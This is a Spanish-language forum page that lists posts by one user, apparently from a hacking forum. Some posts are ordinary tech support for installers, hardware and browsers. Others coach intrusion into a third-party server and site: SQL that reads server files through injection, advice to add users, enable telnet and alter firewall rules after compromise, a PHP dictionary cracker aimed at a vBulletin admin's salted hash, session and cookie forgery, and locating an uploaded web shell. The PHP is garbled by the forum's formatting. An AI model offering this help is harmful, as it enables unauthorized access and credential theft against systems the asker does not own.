Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#1861
Generalmente sucede cuando el instalador está corrupto, lamentablemente es software cerrado por lo tanto es casi imposible saber que sucedió a menos que sepas utilizar un debugger.

Estas usando windows 7? deshabilitaste el uac? lo ejecutaste con permisos de administración? talves la setup fue hecha para windows xp, probaste el modo de compatibilidad?

Tienes otra pc con windows xp para que lo pruebes? sabes utilizar el virtualbox para testearlo ahi?

Dale un vistazo a todas esas alternativas y nos cuentas que cosas has probado, que te funciona y que no.

Saludos.
#1862
mira, prueba con esto:

Código (sql) [Seleccionar]
create table archivos(
contenido varbinary(MAX),
nombre nchar(255)
);

insert into archivos (contenido, nombre) values (convert(varbinary(MAX), (
select * from openrowset(bulk N'C:\Windows\win.ini', SINGLE_BLOB) test
)), 'win.ini');


La idea es que hagas una tabla con dos columnas, el nombre del archivo y su contenido, luego tomas el archivo y lo metes a la base de datos, luego lo consultas desde la misma inyección :P

Si te funciona nos cuentas.
Saludos.
#1863
pd: el cuadradito es de color negro y se ve borroso. como la imagen del televisor cuando no capta bien la señal xD! .

exacto! ese es el tipo de problema cuando alguna pieza del hardware falla en especial la tarjeta de video y el procesador.

Puedes darle un  vistazo a tu tarjeta de video y a la placa madre? dale un vistazo si tiene condensadores sulfatados o reventados, vee si la cabeza del procesador está picado o con una aureola negra, pasale un test de hardware completo, ponle un juego medio pesado y vee que sucede, por ejemplo el need for speed underground 1, te va a correr medianamente lento pero eso hará que fuerce tu hardware al máximo, si se pega y te aparecen rayas de colores o como interferencia de televisión y deja de funcionar todo entonces es tu hardware definitivamente, si no pasa nada entonces entraría a dudar que es.
#1864
Y si intentas habilitar escritorio remoto y agregar un usuario nuevo para acceder?
Igual todo depende de los permisos que se le haya dado a la ejecución del motor MSSQL.

Recuerda tambien que desde windows server 2007 y Windows 7 ya no viene habilitado con tftp ni telnet, esas herramientas ahora vienen deshabilitadas por defecto, lo que si puedes hacer es desde la consola habilitar el servidor telnet y desde el comando reg add agregar una regla al firewall, pero como te digo, todo depende de los permisos que tenga la base de datos.

Haz la prueba y hazle un reboot con shutdown -r jajajaja si se reinicia es porque tienes permisos suficientes para trollear un buén rato xD y si no se reinicia entonces no podrás hacer mucho ya que significa que solo tienes permisos locales aunque de todas formas puedes hacer muchas cosas como tratar de que te escriba un archivo con la version del sistema operativo y despues leerlo con select * from openrowset(bulk N'C:\...temp\so.txt', SINGLE_BLOB)

Suerte! y nos cuentas como te fue o si tienes alguna duda.

Saludos.
#1865
jajaja que largo el salt xD pero ya con ese dato podrás facilmente crackear la contraseña porque recuerda que md5 es un cifrado de una via, o sea que no se puee descifrar pero si comparar:

Código (php) [Seleccionar]
<?php
/*
Admin id1
hash: e53a3baca64869cb558bc6f6f5fab4f5
salt: aY-t'2c;`&s?GYYqsDnUP=(AQ(mH'8
*/

/* Config */
$hash 'e53a3baca64869cb558bc6f6f5fab4f5';
$salt 'aY-t\'2c;`&s?GYYqsDnUP=(AQ(mH\'8';
$listado file('diccionario.txt');
$pass false;

/* Busca */
foreach($diccionario as $palabra){
if($palabra trim((string)$palabra)){
if(md5(md5($palabra).$salt) === (string)$hash){
$pass $palabra;
break;
}
}
}

if(
$pass)
echo 'La clave es: '.htmlspecialchars($passENT_QUOTES);
else
echo 'Imposible obtener la clave :(';
?>


Ahora necesitas un buen diccionario de palabras :D y a crackear se ha dicho!

Nota: Cuidado donde aparece "&lt;" porque puede ser que realmente sea "&", lo que sucede es que el sistema de coloreado de código transforma algunas cosas de forma automática  :¬¬

¿Porque no usas ese hash y ese sat para generar una cookie de autentificación mejor? talves sea mas facil que crackear la contraseña no crees?
#1866
Nivel Web / Re: descifrar Hash vbulletin 4.1.3
28 Marzo 2013, 22:05 PM
Mira, este es el algoritmo:
Código (php) [Seleccionar]
<?php md5(md5($pass).$salt); ?>

Es practicamente imposible descifrar porque es de una sola via + el salt pero si puedes crackearlas siempre y cuando tengas el salt de cada cuenta.

Tambien puedes probar inyectando sesiones en tu explorador utilizando esos hashses.

Saludos.
#1867
Lo que se ve en la captura es que se visualiza pero no se interpreta el archivo php, puede que haya quedado en la base de datos por ejemplo y solo se esté mostrando con un echo, talves está en un directorio no accesible, talves tiene una extension en txt puesto por el sistema web, quien sabe.

Intenta subir una imagen y dale un vistazo hacia donde apunta, despues intenta buscar tu shell en ese directorio.

Saludos.
#1868
Hay varias cosas que pueden suceder, lo primero es que tu explorador no cargó correctamente el cursor, en ese caso refresca tu navegador o limpia tus archivos temporales, también puede ser que estes usando un explorador no estandarizado bajo los estandares mundiales ISO, firefox, safari, chrome, internet explorer 9 son algunos de los que si se estandarizan o por lo menos lo intentan.

Otra cosa que pueda estar sucediendo es que tu tarjeta de video tenga problemas o sea demasiado antigua, creeme que aunque parezca increhible pasa, lo digo por experiencia propia, me ha pasado en muchos computadores incluyendo un imac con problemas en el procesador, a veces funcionaba el puntero y a veces se despixelaba.

Has probado con otro explorador?.
#1869
Encontré un sitio WEB muy genial donde puedes probar códigos online sin la necesidad de tener instalado el compilador:

http://www.compileonline.com/

A mi me ha servido muchisimo porque he necesitado testear código php, sql y .net y todo va de lujo :D

Saludos, espero que les sirva.
#1870
Nosotros no tenemos nada que ver con pornografía, lo mas probable es que la persona encargada de crear dichos filtros haya dicho:

Aver... que cosas malas censuramos a la gente? pornografía infantil, hacking, estafas, etc etc.

Son personas que no tienen un bocabulario enriquecido, son pobres intelectualmente y mezclan las cosas diciendo que todos los carniceros del mundo son acesinos porque usan cuchillos.

Desgraciadamente si el estado es el encargado de crear dicha lista de palabras entonces es porque el estado donde vives no tienen a alguien capacitado para comprender temas de informática, normalmente alguien que quiere crear un listado de cosas debe asesorarse por personas que entienden del tema y no hacerlo bajo su propio gusto y anotojo.

Es la diferencia con paises europeos y mas altos como francia y rusia donde primero piensan y después hacen las cosas.